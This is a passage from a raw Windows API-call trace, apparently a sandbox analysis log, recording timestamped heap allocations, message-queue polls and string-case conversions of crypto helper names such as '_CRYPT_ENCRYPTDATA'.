lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144ecd0*=0x0, lpOverlapped=0x0) returned 1 [0079.076] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0079.076] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0079.076] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0079.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0079.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xba63) returned 0x499a008 [0079.079] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e04020 | out: hHeap=0x1780000) returned 1 [0079.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0079.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0079.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0079.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0079.082] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0079.082] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xba63) returned 0x49a5a78 [0079.083] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x499a008 | out: hHeap=0x1780000) returned 1 [0079.083] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0079.083] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0079.083] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0079.083] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0079.083] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0079.084] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0079.084] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0079.084] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xba63) returned 0x499a008 [0079.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0079.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x499a008 | out: hHeap=0x1780000) returned 1 [0079.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0079.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0079.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0079.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0079.084] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0079.084] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0079.084] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0079.084] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797028 [0079.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797028 | out: hHeap=0x1780000) returned 1 [0079.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0079.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0079.084] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac740 [0079.084] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0079.084] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0079.084] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0079.084] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d90 [0079.084] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0079.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d90 | out: hHeap=0x1780000) returned 1 [0079.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0079.084] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0079.085] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2640 [0079.085] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0079.085] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0079.085] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0079.085] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0079.085] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xba63) returned 0x499a008 [0079.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0079.085] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26a0 [0079.085] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0079.085] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0079.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0079.085] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2600 [0079.085] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0079.085] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0079.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0079.085] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2660 [0079.085] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0079.085] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0079.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0079.085] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca7a8 [0079.085] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0079.085] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0079.085] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0079.086] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0079.086] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0079.086] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xba63) returned 0x49b14e8 [0079.086] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0079.087] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0079.087] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0079.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0079.087] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0079.087] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0079.087] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0079.087] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0079.087] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0079.087] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0079.087] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0079.087] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0079.087] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0079.087] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0079.087] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0079.087] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0079.087] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0079.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0079.087] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0079.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0079.087] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac780 [0079.087] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0079.087] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0079.087] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0079.087] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0079.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0079.088] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0079.088] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0079.088] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0079.088] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0079.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0079.088] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0079.088] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d98 [0079.088] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0079.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d98 | out: hHeap=0x1780000) returned 1 [0079.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0079.088] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0079.088] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2750 [0079.088] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0079.088] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0079.088] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0079.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0079.088] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cac88 [0079.088] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0079.088] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0079.088] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0079.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0079.088] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0079.088] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0079.088] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0079.089] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0079.089] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0079.089] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0079.089] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0079.089] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0079.089] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0079.089] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0079.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0079.089] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0079.089] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0079.089] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0079.089] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0079.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0079.089] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796f08 [0079.089] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0079.089] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0079.089] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0079.089] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0079.089] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0079.089] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0079.089] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0079.089] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0079.089] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0079.089] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0079.090] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0079.090] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0079.090] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0079.090] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0079.090] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0079.090] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0079.090] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0079.090] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0079.090] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0079.090] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0079.090] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0079.090] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0079.090] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0079.090] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0079.090] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0170 | out: hHeap=0x1780000) returned 1 [0079.090] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0079.090] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0079.090] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0079.090] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0079.090] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0079.090] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0079.090] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0079.090] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0079.090] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0079.090] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0079.090] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0079.091] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0079.091] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0079.091] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b60 [0079.091] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b60 | out: hHeap=0x1780000) returned 1 [0079.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0079.091] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cabe0 [0079.091] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0079.091] PeekMessageW (in: lpMsg=0x144dfec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144dfec) returned 0 [0079.091] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0079.091] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0079.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0079.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0079.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8cc0 | out: hHeap=0x1780000) returned 1 [0079.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0079.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0079.091] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0079.091] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0079.091] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0079.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0079.091] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0079.091] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0079.091] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0079.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0079.091] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0079.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0079.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0079.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0079.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0079.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0079.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0079.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0079.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0079.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0079.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0079.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0079.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0079.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0079.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0079.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0079.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0079.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0079.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0079.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0079.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0079.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0079.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ec8 [0079.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2bd8 [0079.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0079.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0079.093] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0079.093] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0079.093] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0079.093] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0079.093] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0079.093] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0079.094] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0079.094] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0079.094] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0079.094] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0079.094] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796f48 [0079.094] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0079.094] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0079.094] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0079.094] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0079.094] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0079.094] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0079.094] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0079.094] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0079.094] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0079.094] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0079.094] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0079.094] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0079.094] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.094] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0079.094] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0079.094] HeapFree (in: hHeap=0x1780000, 